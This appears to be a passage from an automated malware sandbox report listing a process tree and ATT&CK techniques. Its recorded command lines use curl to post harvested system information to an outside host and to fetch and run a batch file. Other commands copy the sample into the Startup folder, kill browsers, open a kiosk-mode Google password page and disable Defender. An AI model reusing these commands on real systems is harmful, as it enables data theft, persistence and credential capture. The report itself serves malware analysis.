- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo8⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:3356
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"7⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"7⤵
- System Location Discovery: System Language Discovery
PID:4016
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"7⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"7⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt7⤵
- System Location Discovery: System Language Discovery
PID:3616
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"7⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014088001\646bc9d341.exe"C:\Users\Admin\AppData\Local\Temp\1014088001\646bc9d341.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\1014088001\646bc9d341.exe"C:\Users\Admin\AppData\Local\Temp\1014088001\646bc9d341.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014089001\81320a396c.exe"C:\Users\Admin\AppData\Local\Temp\1014089001\81320a396c.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:312
C:\Users\Admin\AppData\Local\Temp\1014090001\0da45764eb.exe (level 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\1014090001\0da45764eb.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5024

C:\Users\Admin\AppData\Local\Temp\1014091001\57a033a9a4.exe (level 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\1014091001\57a033a9a4.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920

C:\Windows\SysWOW64\taskkill.exe (level 7)
Command line: taskkill /F /IM firefox.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Windows\SysWOW64\taskkill.exe (level 7)
Command line: taskkill /F /IM chrome.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\SysWOW64\taskkill.exe (level 7)
Command line: taskkill /F /IM msedge.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3424

C:\Windows\SysWOW64\taskkill.exe (level 7)
Command line: taskkill /F /IM opera.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Windows\SysWOW64\taskkill.exe (level 7)
Command line: taskkill /F /IM brave.exe /T
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Program Files\Mozilla Firefox\firefox.exe (level 7)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
PID:2612

C:\Program Files\Mozilla Firefox\firefox.exe (level 8)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1352

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2076 -parentBuildID 20240401114208 -prefsHandle 2000 -prefMapHandle 1992 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {890c131d-e41d-4d2e-9da9-b8f113e0ed82} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" gpu
PID:3672

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {02508b26-9c95-4a40-b611-b22c62b994d3} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" socket
PID:3708

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2808 -childID 1 -isForBrowser -prefsHandle 2748 -prefMapHandle 2804 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e75d1e0-c555-4862-9255-19c6a547322a} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" tab
PID:224

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4060 -childID 2 -isForBrowser -prefsHandle 4064 -prefMapHandle 4052 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c966b922-758d-4ad3-85a8-aa46f1c5857e} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" tab
PID:2988

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4952 -prefMapHandle 4944 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa2f348e-cad1-4838-a8af-5546be35500a} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" utility
- Checks processor information in registry
PID:6248

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 3 -isForBrowser -prefsHandle 5388 -prefMapHandle 5640 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {29d30fa8-eae7-4b19-a648-e7bb60d87328} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" tab
PID:3976

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5788 -prefMapHandle 5796 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a6555e9-dad7-435a-9a8e-7cbb4082c7eb} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" tab
PID:4276

C:\Program Files\Mozilla Firefox\firefox.exe (level 9)
Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5952 -childID 5 -isForBrowser -prefsHandle 5960 -prefMapHandle 5968 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {346a4d27-c75b-4504-b63d-c2fbd12db676} 1352 "\\.\pipe\gecko-crash-server-pipe.1352" tab
PID:6184

C:\Users\Admin\AppData\Local\Temp\1014092001\1e2a9f4dd4.exe (level 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\1014092001\1e2a9f4dd4.exe"
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Users\Admin\AppData\Local\Temp\1014093001\9fadc6f806.exe (level 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\1014093001\9fadc6f806.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3236

C:\Users\Admin\AppData\Local\Temp\1014094001\8acb171f29.exe (level 6)
Command line: "C:\Users\Admin\AppData\Local\Temp\1014094001\8acb171f29.exe"
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4980

C:\Windows\SysWOW64\WerFault.exe (level 7)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 1792
- Program crash
PID:6020

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2G5656.exe (level 4)
Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2G5656.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3064

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e05g.exe (level 3)
Command line: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e05g.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3500

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4f675h.exe (level 2)
Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4f675h.exe
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe (level 1)
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4048

C:\Windows\SysWOW64\WerFault.exe (level 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4980 -ip 4980
PID:6000

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe (level 1)
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6124

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe (level 1)
Command line: C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6792
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
- Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
- Windows Service (1)
Defense Evasion
- Impair Defenses (2)
- Disable or Modify Tools (2)
- Modify Registry (3)
- Virtualization/Sandbox Evasion (2)
Downloads